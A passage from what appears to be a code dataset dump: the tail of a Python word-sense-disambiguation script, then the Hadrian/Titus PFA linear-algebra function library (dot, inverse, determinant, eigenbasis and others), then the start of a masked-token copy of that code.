pred_case: int = 1, vocab: Dict = None) -> str:\n \"\"\"\n Taking either a List or String in input, that represents the found Babelnet ID, this function handles it and return a string that contains the value of the prediction\n :param value: The Value from which to extrapolate the actual meaning found\n :param pred_case: whether to adopt a \"rollback\" strategy such as MFS or not. Possible values:\n 1 --> Means I'm predicting with Babelnet. No extra precautions needed\n 2 --> Means I'm predicting with WordNet Domains. Need to consult the vocab. If I don't find anything, the empty class \"factotum\" is returned instead\n 3 --> Means I'm predicting with Lexicon. Need to consult the vocab.\n :param vocab: The vocab in support of mode 2 or 3.\n :return: the actual meaning found with MFS\n \"\"\"\n the_meaning_to_explot = __type_checker(value)\n if pred_case == 1:\n return the_meaning_to_explot\n if pred_case == 2:\n to_return = vocab.get(the_meaning_to_explot)\n return to_return[0] if to_return else \"factotum\"\n if pred_case == 3:\n to_return = vocab.get(the_meaning_to_explot)\n return to_return[0]\n\ndef __type_checker(value: object) -> str:\n \"\"\"\n Checks the type of the object and, accordingly, returns it\n :param value: the value to examinate\n :return: a string that is the value expected\n \"\"\"\n if type(value) == str:\n return value\n if type(value) == list:\n return value[0]\n\ndef __decide_pos(pos: str) -> str:\n \"\"\"\n Decides the WN representation of the given pos in input\n :param pos: the pos to interpret with WordNet\n :return: the WN representation of the given pos\n \"\"\"\n to_return = None\n if pos == 'NOUN':\n to_return = \"n\"\n if pos == 'VERB':\n to_return = 'v'\n if pos == 'ADJ':\n to_return = 'a'\n if pos == 'ADV':\n to_return = 'r'\n return to_return\n\n\ndef convert_from_wnlist_2_bnlist(list_of_bn: List, vocab: Dict) -> List:\n \"\"\"\n Cast the given list (which contains only WN ids) to Babelnet IDs\n :param list_of_bn: the list to cast\n :param vocab: the vocabulary to use to perform the conversion\n :return: the converted list\n \"\"\"\n list_of_possible_senses_bn_version = []\n for candidate in list_of_bn:\n is_it_here = next(key for key, value in vocab.items() if candidate in value)\n if is_it_here:\n list_of_possible_senses_bn_version.append(is_it_here if type(is_it_here) == str else is_it_here[0])\n return list_of_possible_senses_bn_version\n\ndef create_custom_label(list_of_possible_senses: List, word: str, vocab: Dict, predictions, enable_coarse_grained: int = 1) -> List:\n \"\"\"\n Converts the list of babelnet IDS to a number and outputs the converted list\n :param list_of_possible_senses: the list that contains all the babelnet's IDs\n :param word: the word for which we are predicting the sense in a specific moment\n :param vocab: the vocabulary Word -> Serial to exploit for the conversion\n :param predictions: the predictions made by the system\n :param enable_coarse_grained: changes the flow of the function from fine-grained to coarse-grained. Default to None. Possible values:\n 1 --> The flow will still be the same\n 2,3 -> Flow will change, triggering the first step for the coarse-grained approach.\n :return: a List with the IDs converted\n \"\"\"\n to_return = []\n list_of_indices_to_delete = []\n for indice in range(len(list_of_possible_senses)):\n new_string = word + \"_\" + list_of_possible_senses[indice] if enable_coarse_grained == 1 else list_of_possible_senses[indice]\n conversion = None\n try:\n conversion = int(vocab[new_string])\n to_return.append(predictions[conversion])\n except:\n list_of_indices_to_delete.append(indice)\n continue\n if list_of_indices_to_delete:\n list_of_possible_senses = [list_of_possible_senses[prov_index] for prov_index in range(len(list_of_possible_senses)) if prov_index not in list_of_indices_to_delete]\n return to_return, list_of_possible_senses\n\n\n\nif __name__ == \"__main__\":\n predict_babelnet(\"/Users/gimmi/Desktop/Università/MAGISTRALE/NLP/nlp-finalproject/dataset/test/senseval3.data.xml\", \"../output\", \"/Users/gimmi/Desktop/Università/MAGISTRALE/NLP/nlp-finalproject/resources\")\n #predict_wordnet_domains(\"/Users/gimmi/Desktop/Università/MAGISTRALE/NLP/nlp-finalproject/dataset/test/senseval3.data.xml\", \"../output\", \"/Users/gimmi/Desktop/Università/MAGISTRALE/NLP/nlp-finalproject/resources\")\n #predict_lexicographer(\"/Users/gimmi/Desktop/Università/MAGISTRALE/NLP/nlp-finalproject/dataset/test/senseval3.data.xml\", \"../output\", \"/Users/gimmi/Desktop/Università/MAGISTRALE/NLP/nlp-finalproject/resources\")\n",
"step-ids": [
7,
9,
11,
12,
15
]
}
|
[
7,
9,
11,
12,
15
] |
#!/usr/bin/env python
# Copyright (C) 2014 Open Data ("Open Data" refers to
# one or more of the following companies: Open Data Partners LLC,
# Open Data Research LLC, or Open Data Capital LLC.)
#
# This file is part of Hadrian.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import math
from titus.fcn import Fcn
from titus.fcn import LibFcn
from titus.signature import Sig
from titus.signature import Sigs
from titus.datatype import *
from titus.errors import *
from titus.util import callfcn, div
import titus.P as P
from functools import reduce
provides = {}
def provide(fcn):
provides[fcn.name] = fcn
prefix = "la."
def np():
import numpy
return numpy
def rowKeys(x):
return set(x.keys())
def colKeys(x):
if len(x) == 0:
return set()
else:
return reduce(lambda a, b: a.union(b), [set(xi.keys()) for xi in list(x.values())])
def arraysToMatrix(x):
return np().matrix(x, dtype=np().double)
def arrayToRowVector(x):
return np().matrix(x, dtype=np().double).T
def rowVectorToArray(x):
return x.T.tolist()[0]
def matrixToArrays(x):
return x.tolist()
def mapsToMatrix(x, rows, cols):
return np().matrix([[x.get(i, {}).get(j, 0.0) for j in cols] for i in rows], dtype=np().double)
def mapToRowVector(x, keys):
return np().matrix([x.get(k, 0.0) for k in keys], dtype=np().double).T
def rowVectorToMap(x, keys):
return dict(list(zip(keys, x.T.tolist()[0])))
def matrixToMaps(x, rows, cols):
return dict((row, dict(list(zip(cols, xi)))) for row, xi in zip(rows, x.tolist()))
def raggedArray(x):
collens = list(map(len, x))
return max(collens) != min(collens)
def raggedMap(x):
return len(set(len(xi) for xi in list(x.values()))) != 1
class MapApply(LibFcn):
name = prefix + "map"
sig = Sigs([Sig([{"x": P.Array(P.Array(P.Double()))}, {"fcn": P.Fcn([P.Double()], P.Double())}], P.Array(P.Array(P.Double()))),
Sig([{"x": P.Map(P.Map(P.Double()))}, {"fcn": P.Fcn([P.Double()], P.Double())}], P.Map(P.Map(P.Double())))])
errcodeBase = 24000
def __call__(self, state, scope, pos, paramTypes, x, fcn):
if isinstance(x, (list, tuple)) and all(isinstance(xi, (list, tuple)) for xi in x):
return [[callfcn(state, scope, fcn, [xj]) for xj in xi] for xi in x]
elif isinstance(x, dict) and all(isinstance(x[i], dict) for i in list(x.keys())):
return dict((i, dict((j, callfcn(state, scope, fcn, [xj])) for j, xj in list(xi.items()))) for i, xi in list(x.items()))
provide(MapApply())
class Scale(LibFcn):
name = prefix + "scale"
sig = Sigs([Sig([{"x": P.Array(P.Double())}, {"alpha": P.Double()}], P.Array(P.Double())),
Sig([{"x": P.Array(P.Array(P.Double()))}, {"alpha": P.Double()}], P.Array(P.Array(P.Double()))),
Sig([{"x": P.Map(P.Double())}, {"alpha": P.Double()}], P.Map(P.Double())),
Sig([{"x": P.Map(P.Map(P.Double()))}, {"alpha": P.Double()}], P.Map(P.Map(P.Double())))])
errcodeBase = 24010
def __call__(self, state, scope, pos, paramTypes, x, alpha):
if isinstance(x, (list, tuple)) and all(isinstance(xi, (list, tuple)) for xi in x):
return [[xj * alpha for xj in xi] for xi in x]
elif isinstance(x, (list, tuple)):
return [xi * alpha for xi in x]
elif isinstance(x, dict) and all(isinstance(x[i], dict) for i in x):
return dict((i, dict((j, xj * alpha) for j, xj in list(xi.items()))) for i, xi in list(x.items()))
else:
return dict((i, xi * alpha) for i, xi in list(x.items()))
provide(Scale())
class ZipMap(LibFcn):
name = prefix + "zipmap"
sig = Sigs([Sig([{"x": P.Array(P.Array(P.Double()))}, {"y": P.Array(P.Array(P.Double()))}, {"fcn": P.Fcn([P.Double(), P.Double()], P.Double())}], P.Array(P.Array(P.Double()))),
Sig([{"x": P.Map(P.Map(P.Double()))}, {"y": P.Map(P.Map(P.Double()))}, {"fcn": P.Fcn([P.Double(), P.Double()], P.Double())}], P.Map(P.Map(P.Double())))])
errcodeBase = 24020
def __call__(self, state, scope, pos, paramTypes, x, y, fcn):
if isinstance(x, (list, tuple)) and all(isinstance(xi, (list, tuple)) for xi in x) and \
isinstance(y, (list, tuple)) and all(isinstance(yi, (list, tuple)) for yi in y):
if len(x) != len(y) or any(len(xi) != len(yi) for xi, yi in zip(x, y)):
raise PFARuntimeException("misaligned matrices", self.errcodeBase + 0, self.name, pos)
return [[callfcn(state, scope, fcn, [xj, yj]) for xj, yj in zip(xi, yi)] for xi, yi in zip(x, y)]
elif isinstance(x, dict) and all(isinstance(x[i], dict) for i in list(x.keys())) and \
isinstance(y, dict) and all(isinstance(y[i], dict) for i in list(y.keys())):
rows = rowKeys(x).union(rowKeys(y))
cols = colKeys(x).union(colKeys(y))
return dict((i, dict((j, callfcn(state, scope, fcn, [x.get(i, {}).get(j, 0.0), y.get(i, {}).get(j, 0.0)])) for j in cols)) for i in rows)
provide(ZipMap())
class Add(LibFcn):
name = prefix + "add"
sig = Sigs([Sig([{"x": P.Array(P.Double())}, {"y": P.Array(P.Double())}], P.Array(P.Double())),
Sig([{"x": P.Array(P.Array(P.Double()))}, {"y": P.Array(P.Array(P.Double()))}], P.Array(P.Array(P.Double()))),
Sig([{"x": P.Map(P.Double())}, {"y": P.Map(P.Double())}], P.Map(P.Double())),
Sig([{"x": P.Map(P.Map(P.Double()))}, {"y": P.Map(P.Map(P.Double()))}], P.Map(P.Map(P.Double())))])
errcodeBase = 24030
def __call__(self, state, scope, pos, paramTypes, x, y):
if isinstance(x, (list, tuple)) and all(isinstance(xi, (list, tuple)) for xi in x) and \
isinstance(y, (list, tuple)) and all(isinstance(yi, (list, tuple)) for yi in y):
if len(x) != len(y) or any(len(xi) != len(yi) for xi, yi in zip(x, y)):
raise PFARuntimeException("misaligned matrices", self.errcodeBase + 0, self.name, pos)
return [[xj + yj for xj, yj in zip(xi, yi)] for xi, yi in zip(x, y)]
elif isinstance(x, (list, tuple)) and isinstance(y, (list, tuple)):
if len(x) != len(y):
raise PFARuntimeException("misaligned matrices", self.errcodeBase + 0, self.name, pos)
return [xi + yi for xi, yi in zip(x, y)]
elif isinstance(x, dict) and all(isinstance(x[i], dict) for i in list(x.keys())) and \
isinstance(y, dict) and all(isinstance(y[i], dict) for i in list(y.keys())):
rows = rowKeys(x).union(rowKeys(y))
cols = colKeys(x).union(colKeys(y))
return dict((i, dict((j, x.get(i, {}).get(j, 0.0) + y.get(i, {}).get(j, 0.0)) for j in cols)) for i in rows)
else:
rows = rowKeys(x).union(rowKeys(y))
return dict((i, x.get(i, 0.0) + y.get(i, 0.0)) for i in rows)
provide(Add())
class Sub(LibFcn):
name = prefix + "sub"
sig = Sigs([Sig([{"x": P.Array(P.Double())}, {"y": P.Array(P.Double())}], P.Array(P.Double())),
Sig([{"x": P.Array(P.Array(P.Double()))}, {"y": P.Array(P.Array(P.Double()))}], P.Array(P.Array(P.Double()))),
Sig([{"x": P.Map(P.Double())}, {"y": P.Map(P.Double())}], P.Map(P.Double())),
Sig([{"x": P.Map(P.Map(P.Double()))}, {"y": P.Map(P.Map(P.Double()))}], P.Map(P.Map(P.Double())))])
errcodeBase = 24040
def __call__(self, state, scope, pos, paramTypes, x, y):
if isinstance(x, (list, tuple)) and all(isinstance(xi, (list, tuple)) for xi in x) and \
isinstance(y, (list, tuple)) and all(isinstance(yi, (list, tuple)) for yi in y):
if len(x) != len(y) or any(len(xi) != len(yi) for xi, yi in zip(x, y)):
raise PFARuntimeException("misaligned matrices", self.errcodeBase + 0, self.name, pos)
return [[xj - yj for xj, yj in zip(xi, yi)] for xi, yi in zip(x, y)]
elif isinstance(x, (list, tuple)) and isinstance(y, (list, tuple)):
if len(x) != len(y):
raise PFARuntimeException("misaligned matrices", self.errcodeBase + 0, self.name, pos)
return [xi - yi for xi, yi in zip(x, y)]
elif isinstance(x, dict) and all(isinstance(x[i], dict) for i in list(x.keys())) and \
isinstance(y, dict) and all(isinstance(y[i], dict) for i in list(y.keys())):
rows = rowKeys(x).union(rowKeys(y))
cols = colKeys(x).union(colKeys(y))
return dict((i, dict((j, x.get(i, {}).get(j, 0.0) - y.get(i, {}).get(j, 0.0)) for j in cols)) for i in rows)
else:
rows = rowKeys(x).union(rowKeys(y))
return dict((i, x.get(i, 0.0) - y.get(i, 0.0)) for i in rows)
provide(Sub())
class Dot(LibFcn):
name = prefix + "dot"
sig = Sigs([Sig([{"x": P.Array(P.Array(P.Double()))}, {"y": P.Array(P.Double())}], P.Array(P.Double())),
Sig([{"x": P.Map(P.Map(P.Double()))}, {"y": P.Map(P.Double())}], P.Map(P.Double())),
Sig([{"x": P.Array(P.Array(P.Double()))}, {"y": P.Array(P.Array(P.Double()))}], P.Array(P.Array(P.Double()))),
Sig([{"x": P.Map(P.Map(P.Double()))}, {"y": P.Map(P.Map(P.Double()))}], P.Map(P.Map(P.Double())))])
errcodeBase = 24050
def __call__(self, state, scope, pos, paramTypes, x, y):
if paramTypes[1]["type"] == "array":
if isinstance(paramTypes[1]["items"], dict) and paramTypes[1]["items"]["type"] == "array":
# array matrix-matrix case
bad = any(any(math.isnan(z) or math.isinf(z) for z in row) for row in x) or \
any(any(math.isnan(z) or math.isinf(z) for z in row) for row in y)
xmat = arraysToMatrix(x)
ymat = arraysToMatrix(y)
if xmat.shape[0] == 0 or xmat.shape[1] == 0 or ymat.shape[0] == 0 or ymat.shape[1] == 0:
raise PFARuntimeException("too few rows/cols", self.errcodeBase + 1, self.name, pos)
try:
if bad: raise PFARuntimeException("contains non-finite value", self.errcodeBase + 2, self.name, pos)
return matrixToArrays(np().dot(xmat, ymat))
except ValueError:
raise PFARuntimeException("misaligned matrices", self.errcodeBase + 0, self.name, pos)
else:
# array matrix-vector case
bad = any(any(math.isnan(z) or math.isinf(z) for z in row) for row in x) or \
any(math.isnan(z) or math.isinf(z) for z in y)
xmat = arraysToMatrix(x)
ymat = arrayToRowVector(y)
if xmat.shape[0] == 0 or xmat.shape[1] == 0 or ymat.shape[0] == 0 or ymat.shape[1] == 0:
raise PFARuntimeException("too few rows/cols", self.errcodeBase + 1, self.name, pos)
try:
if bad: raise PFARuntimeException("contains non-finite value", self.errcodeBase + 2, self.name, pos)
return rowVectorToArray(np().dot(xmat, ymat))
except ValueError:
raise PFARuntimeException("misaligned matrices", self.errcodeBase + 0, self.name, pos)
elif paramTypes[1]["type"] == "map":
if isinstance(paramTypes[1]["values"], dict) and paramTypes[1]["values"]["type"] == "map":
# map matrix-matrix case
bad = any(any(math.isnan(z) or math.isinf(z) for z in list(row.values())) for row in list(x.values())) or \
any(any(math.isnan(z) or math.isinf(z) for z in list(row.values())) for row in list(y.values()))
rows = list(rowKeys(x))
inter = list(colKeys(x).union(rowKeys(y)))
cols = list(colKeys(y))
xmat = mapsToMatrix(x, rows, inter)
ymat = mapsToMatrix(y, inter, cols)
if xmat.shape[0] == 0 or xmat.shape[1] == 0 or ymat.shape[0] == 0 or ymat.shape[1] == 0:
raise PFARuntimeException("too few rows/cols", self.errcodeBase + 1, self.name, pos)
if bad: raise PFARuntimeException("contains non-finite value", self.errcodeBase + 2, self.name, pos)
return matrixToMaps(np().dot(xmat, ymat), rows, cols)
else:
# map matrix-vector case
bad = any(any(math.isnan(z) or math.isinf(z) for z in list(row.values())) for row in list(x.values())) or \
any(math.isnan(z) or math.isinf(z) for z in list(y.values()))
rows = list(rowKeys(x))
cols = list(colKeys(x).union(rowKeys(y)))
xmat = mapsToMatrix(x, rows, cols)
ymat = mapToRowVector(y, cols)
if xmat.shape[0] == 0 or xmat.shape[1] == 0 or ymat.shape[0] == 0 or ymat.shape[1] == 0:
raise PFARuntimeException("too few rows/cols", self.errcodeBase + 1, self.name, pos)
if bad: raise PFARuntimeException("contains non-finite value", self.errcodeBase + 2, self.name, pos)
return rowVectorToMap(np().dot(xmat, ymat), rows)
provide(Dot())
class Transpose(LibFcn):
name = prefix + "transpose"
sig = Sigs([Sig([{"x": P.Array(P.Array(P.Double()))}], P.Array(P.Array(P.Double()))),
Sig([{"x": P.Map(P.Map(P.Double()))}], P.Map(P.Map(P.Double())))])
errcodeBase = 24060
def __call__(self, state, scope, pos, paramTypes, x):
if isinstance(x, (list, tuple)) and all(isinstance(xi, (list, tuple)) for xi in x):
rows = len(x)
if rows < 1:
raise PFARuntimeException("too few rows/cols", self.errcodeBase + 0, self.name, pos)
cols = len(x[0])
if cols < 1:
raise PFARuntimeException("too few rows/cols", self.errcodeBase + 0, self.name, pos)
if raggedArray(x):
raise PFARuntimeException("ragged columns", self.errcodeBase + 1, self.name, pos)
return [[x[r][c] for r in range(rows)] for c in range(cols)]
elif isinstance(x, dict) and all(isinstance(x[i], dict) for i in list(x.keys())):
rows = rowKeys(x)
cols = colKeys(x)
if len(rows) < 1 or len(cols) < 1:
raise PFARuntimeException("too few rows/cols", self.errcodeBase + 0, self.name, pos)
if raggedMap(x):
raise PFARuntimeException("ragged columns", self.errcodeBase + 1, self.name, pos)
return dict((c, dict((r, x[r][c]) for r in rows)) for c in cols)
provide(Transpose())
class Inverse(LibFcn):
name = prefix + "inverse"
sig = Sigs([Sig([{"x": P.Array(P.Array(P.Double()))}], P.Array(P.Array(P.Double()))),
Sig([{"x": P.Map(P.Map(P.Double()))}], P.Map(P.Map(P.Double())))])
errcodeBase = 24070
def __call__(self, state, scope, pos, paramTypes, x):
if isinstance(x, (list, tuple)) and all(isinstance(xi, (list, tuple)) for xi in x):
rows = len(x)
if rows < 1:
raise PFARuntimeException("too few rows/cols", self.errcodeBase + 0, self.name, pos)
cols = len(x[0])
if cols < 1:
raise PFARuntimeException("too few rows/cols", self.errcodeBase + 0, self.name, pos)
if raggedArray(x):
raise PFARuntimeException("ragged columns", self.errcodeBase + 1, self.name, pos)
return matrixToArrays(arraysToMatrix(x).I)
elif isinstance(x, dict) and all(isinstance(x[i], dict) for i in list(x.keys())):
rows = list(rowKeys(x))
cols = list(colKeys(x))
if len(rows) < 1 or len(cols) < 1:
raise PFARuntimeException("too few rows/cols", self.errcodeBase + 0, self.name, pos)
xmat = mapsToMatrix(x, rows, cols)
return matrixToMaps(xmat.I, cols, rows)
provide(Inverse())
class Trace(LibFcn):
name = prefix + "trace"
sig = Sigs([Sig([{"x": P.Array(P.Array(P.Double()))}], P.Double()),
Sig([{"x": P.Map(P.Map(P.Double()))}], P.Double())])
errcodeBase = 24080
def __call__(self, state, scope, pos, paramTypes, x):
if isinstance(x, (list, tuple)) and all(isinstance(xi, (list, tuple)) for xi in x):
rows = len(x)
if rows == 0:
return 0.0
else:
cols = len(x[0])
if raggedArray(x):
raise PFARuntimeException("ragged columns", self.errcodeBase + 0, self.name, pos)
return sum(x[i][i] for i in range(min(rows, cols)))
elif isinstance(x, dict) and all(isinstance(x[i], dict) for i in list(x.keys())):
keys = rowKeys(x).intersection(colKeys(x))
return sum(x[i][i] for i in keys)
provide(Trace())
class Det(LibFcn):
name = prefix + "det"
sig = Sigs([Sig([{"x": P.Array(P.Array(P.Double()))}], P.Double()),
Sig([{"x": P.Map(P.Map(P.Double()))}], P.Double())])
errcodeBase = 24090
def __call__(self, state, scope, pos, paramTypes, x):
if isinstance(x, (list, tuple)) and all(isinstance(xi, (list, tuple)) for xi in x):
rows = len(x)
if rows < 1:
raise PFARuntimeException("too few rows/cols", self.errcodeBase + 0, self.name, pos)
cols = len(x[0])
if cols < 1:
raise PFARuntimeException("too few rows/cols", self.errcodeBase + 0, self.name, pos)
if raggedArray(x):
raise PFARuntimeException("ragged columns", self.errcodeBase + 1, self.name, pos)
if rows != cols:
raise PFARuntimeException("non-square matrix", self.errcodeBase + 2, self.name, pos)
if any(any(math.isnan(z) or math.isinf(z) for z in row) for row in x):
return float("nan")
else:
return float(np().linalg.det(arraysToMatrix(x)))
elif isinstance(x, dict) and all(isinstance(x[i], dict) for i in list(x.keys())):
keys = list(rowKeys(x).union(colKeys(x)))
if len(keys) < 1 or all(len(row) == 0 for row in list(x.values())):
raise PFARuntimeException("too few rows/cols", self.errcodeBase + 0, self.name, pos)
if any(any(math.isnan(z) or math.isinf(z) for z in list(row.values())) for row in list(x.values())):
return float("nan")
else:
return float(np().linalg.det(mapsToMatrix(x, keys, keys)))
provide(Det())
class Symmetric(LibFcn):
name = prefix + "symmetric"
sig = Sigs([Sig([{"x": P.Array(P.Array(P.Double()))}, {"tol": P.Double()}], P.Boolean()),
Sig([{"x": P.Map(P.Map(P.Double()))}, {"tol": P.Double()}], P.Boolean())])
errcodeBase = 24100
@staticmethod
def same(x, y, tol):
if math.isinf(x) and math.isinf(y) and ((x > 0.0 and y > 0.0) or (x < 0.0 and y < 0.0)):
return True
elif math.isnan(x) and math.isnan(y):
return True
elif not math.isinf(x) and not math.isnan(x) and not math.isinf(y) and not math.isnan(y):
return abs(x - y) < tol
else:
return False
def __call__(self, state, scope, pos, paramTypes, x, tol):
if isinstance(x, (list, tuple)) and all(isinstance(xi, (list, tuple)) for xi in x):
rows = len(x)
if rows < 1:
raise PFARuntimeException("too few rows/cols", self.errcodeBase + 0, self.name, pos)
cols = len(x[0])
if cols < 1:
raise PFARuntimeException("too few rows/cols", self.errcodeBase + 0, self.name, pos)
if raggedArray(x):
raise PFARuntimeException("ragged columns", self.errcodeBase + 1, self.name, pos)
if rows != cols:
raise PFARuntimeException("non-square matrix", self.errcodeBase + 2, self.name, pos)
return all(all(self.same(x[i][j], x[j][i], tol) for j in range(cols)) for i in range(rows))
elif isinstance(x, dict) and all(isinstance(x[i], dict) for i in list(x.keys())):
keys = list(rowKeys(x).union(colKeys(x)))
if len(keys) < 1 or all(len(row) == 0 for row in list(x.values())):
raise PFARuntimeException("too few rows/cols", self.errcodeBase + 0, self.name, pos)
return all(all(self.same(x.get(i, {}).get(j, 0.0), x.get(j, {}).get(i, 0.0), tol) for j in keys) for i in keys)
provide(Symmetric())
class EigenBasis(LibFcn):
name = prefix + "eigenBasis"
sig = Sigs([Sig([{"x": P.Array(P.Array(P.Double()))}], P.Array(P.Array(P.Double()))),
Sig([{"x": P.Map(P.Map(P.Double()))}], P.Map(P.Map(P.Double())))])
errcodeBase = 24110
def calculate(self, x, size):
symm = (x + x.T) * 0.5
evals, evects = np().linalg.eig(symm)
evects = np().array(evects)
evects2 = [evects[:,i] * (-1.0 if evects[0,i] < 0.0 else 1.0) for i in range(size)]
eigvalm2 = [div(1.0, math.sqrt(abs(ei))) for ei in evals]
order = np().argsort(eigvalm2)
out = np().empty((size, size), dtype=np().double)
for i in range(size):
for j in range(size):
out[i,j] = evects2[order[i]][j] * eigvalm2[order[i]]
return out
def __call__(self, state, scope, pos, paramTypes, x):
if isinstance(x, (list, tuple)) and all(isinstance(xi, (list, tuple)) for xi in x):
rows = len(x)
if rows < 1:
raise PFARuntimeException("too few rows/cols", self.errcodeBase + 0, self.name, pos)
cols = len(x[0])
if cols < 1:
raise PFARuntimeException("too few rows/cols", self.errcodeBase + 0, self.name, pos)
if raggedArray(x):
raise PFARuntimeException("ragged columns", self.errcodeBase + 1, self.name, pos)
if rows != cols:
raise PFARuntimeException("non-square matrix", self.errcodeBase + 2, self.name, pos)
if any(any(math.isnan(z) or math.isinf(z) for z in row) for row in x):
raise PFARuntimeException("non-finite matrix", self.errcodeBase + 3, self.name, pos)
return matrixToArrays(self.calculate(arraysToMatrix(x), rows))
elif isinstance(x, dict) and all(isinstance(x[i], dict) for i in list(x.keys())):
keys = list(rowKeys(x).union(colKeys(x)))
if len(keys) < 1 or all(len(z) == 0 for z in list(x.values())):
raise PFARuntimeException("too few rows/cols", self.errcodeBase + 0, self.name, pos)
if any(any(math.isnan(z) or math.isinf(z) for z in list(row.values())) for row in list(x.values())):
raise PFARuntimeException("non-finite matrix", self.errcodeBase + 3, self.name, pos)
return matrixToMaps(self.calculate(mapsToMatrix(x, keys, keys), len(keys)), list(map(str, range(len(keys)))), keys)
provide(EigenBasis())
class Truncate(LibFcn):
name = prefix + "truncate"
sig = Sigs([Sig([{"x": P.Array(P.Array(P.Double()))}, {"keep": P.Int()}], P.Array(P.Array(P.Double()))),
Sig([{"x": P.Map(P.Map(P.Double()))}, {"keep": P.Array(P.String())}], P.Map(P.Map(P.Double())))])
errcodeBase = 24120
def __call__(self, state, scope, pos, paramTypes, x, keep):
if isinstance(keep, int) and keep < 0:
keep = 0
if isinstance(x, (list, tuple)) and all(isinstance(xi, (list, tuple)) for xi in x):
rows = len(x)
if rows < 1:
raise PFARuntimeException("too few rows/cols", self.errcodeBase + 0, self.name, pos)
cols = len(x[0])
if cols < 1:
raise PFARuntimeException("too few rows/cols", self.errcodeBase + 0, self.name, pos)
if raggedArray(x):
raise PFARuntimeException("ragged columns", self.errcodeBase + 1, self.name, pos)
return x[:keep]
elif isinstance(x, dict) and all(isinstance(x[i], dict) for i in list(x.keys())):
rows = rowKeys(x)
cols = colKeys(x)
if len(rows) < 1 or len(cols) < 1:
raise PFARuntimeException("too few rows/cols", self.errcodeBase + 0, self.name, pos)
return dict((k, x[k]) for k in rows if k in keep)
provide(Truncate())
|
normal
|
{
"blob_id": "780dc49c3eaef3fb25ca0aac760326b1c3adc633",
"index": 6002,
"step-1": "<mask token>\n\n\nclass Dot(LibFcn):\n name = prefix + 'dot'\n sig = Sigs([Sig([{'x': P.Array(P.Array(P.Double()))}, {'y': P.Array(P.\n Double())}], P.Array(P.Double())), Sig([{'x': P.Map(P.Map(P.Double(\n )))}, {'y': P.Map(P.Double())}], P.Map(P.Double())), Sig([{'x': P.\n Array(P.Array(P.Double()))}, {'y': P.Array(P.Array(P.Double()))}],\n P.Array(P.Array(P.Double()))), Sig([{'x': P.Map(P.Map(P.Double()))},\n {'y': P.Map(P.Map(P.Double()))}], P.Map(P.Map(P.Double())))])\n errcodeBase = 24050\n\n def __call__(self, state, scope, pos, paramTypes, x, y):\n if paramTypes[1]['type'] == 'array':\n if isinstance(paramTypes[1]['items'], dict) and paramTypes[1][\n 'items']['type'] == 'array':\n bad = any(any(math.isnan(z) or math.isinf(z) for z in row) for\n row in x) or any(any(math.isnan(z) or math.isinf(z) for\n z in row) for row in y)\n xmat = arraysToMatrix(x)\n ymat = arraysToMatrix(y)\n if xmat.shape[0] == 0 or xmat.shape[1] == 0 or ymat.shape[0\n ] == 0 or ymat.shape[1] == 0:\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 1, self.name, pos)\n try:\n if bad:\n raise PFARuntimeException('contains non-finite value',\n self.errcodeBase + 2, self.name, pos)\n return matrixToArrays(np().dot(xmat, ymat))\n except ValueError:\n raise PFARuntimeException('misaligned matrices', self.\n errcodeBase + 0, self.name, pos)\n else:\n bad = any(any(math.isnan(z) or math.isinf(z) for z in row) for\n row in x) or any(math.isnan(z) or math.isinf(z) for z in y)\n xmat = arraysToMatrix(x)\n ymat = arrayToRowVector(y)\n if xmat.shape[0] == 0 or xmat.shape[1] == 0 or ymat.shape[0\n ] == 0 or ymat.shape[1] == 0:\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 1, self.name, pos)\n try:\n if bad:\n raise PFARuntimeException('contains non-finite value',\n self.errcodeBase + 2, self.name, pos)\n return rowVectorToArray(np().dot(xmat, ymat))\n except ValueError:\n raise PFARuntimeException('misaligned matrices', self.\n errcodeBase + 0, self.name, pos)\n elif paramTypes[1]['type'] == 'map':\n if isinstance(paramTypes[1]['values'], dict) and paramTypes[1][\n 'values']['type'] == 'map':\n bad = any(any(math.isnan(z) or math.isinf(z) for z in list(\n row.values())) for row in list(x.values())) or any(any(\n math.isnan(z) or math.isinf(z) for z in list(row.values\n ())) for row in list(y.values()))\n rows = list(rowKeys(x))\n inter = list(colKeys(x).union(rowKeys(y)))\n cols = list(colKeys(y))\n xmat = mapsToMatrix(x, rows, inter)\n ymat = mapsToMatrix(y, inter, cols)\n if xmat.shape[0] == 0 or xmat.shape[1] == 0 or ymat.shape[0\n ] == 0 or ymat.shape[1] == 0:\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 1, self.name, pos)\n if bad:\n raise PFARuntimeException('contains non-finite value', \n self.errcodeBase + 2, self.name, pos)\n return matrixToMaps(np().dot(xmat, ymat), rows, cols)\n else:\n bad = any(any(math.isnan(z) or math.isinf(z) for z in list(\n row.values())) for row in list(x.values())) or any(math\n .isnan(z) or math.isinf(z) for z in list(y.values()))\n rows = list(rowKeys(x))\n cols = list(colKeys(x).union(rowKeys(y)))\n xmat = mapsToMatrix(x, rows, cols)\n ymat = mapToRowVector(y, cols)\n if xmat.shape[0] == 0 or xmat.shape[1] == 0 or ymat.shape[0\n ] == 0 or ymat.shape[1] == 0:\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 1, self.name, pos)\n if bad:\n raise PFARuntimeException('contains non-finite value', \n self.errcodeBase + 2, self.name, pos)\n return rowVectorToMap(np().dot(xmat, ymat), rows)\n\n\n<mask token>\n\n\nclass Transpose(LibFcn):\n name = prefix + 'transpose'\n sig = Sigs([Sig([{'x': P.Array(P.Array(P.Double()))}], P.Array(P.Array(\n P.Double()))), Sig([{'x': P.Map(P.Map(P.Double()))}], P.Map(P.Map(P\n .Double())))])\n errcodeBase = 24060\n\n def __call__(self, state, scope, pos, paramTypes, x):\n if isinstance(x, (list, tuple)) and all(isinstance(xi, (list, tuple\n )) for xi in x):\n rows = len(x)\n if rows < 1:\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 0, self.name, pos)\n cols = len(x[0])\n if cols < 1:\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 0, self.name, pos)\n if raggedArray(x):\n raise PFARuntimeException('ragged columns', self.\n errcodeBase + 1, self.name, pos)\n return [[x[r][c] for r in range(rows)] for c in 